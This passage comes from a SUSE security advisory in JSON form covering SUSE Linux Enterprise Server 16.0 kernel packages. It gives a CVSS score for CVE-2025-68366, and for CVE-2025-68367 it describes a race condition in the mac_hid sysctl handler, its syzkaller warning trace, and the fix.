"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
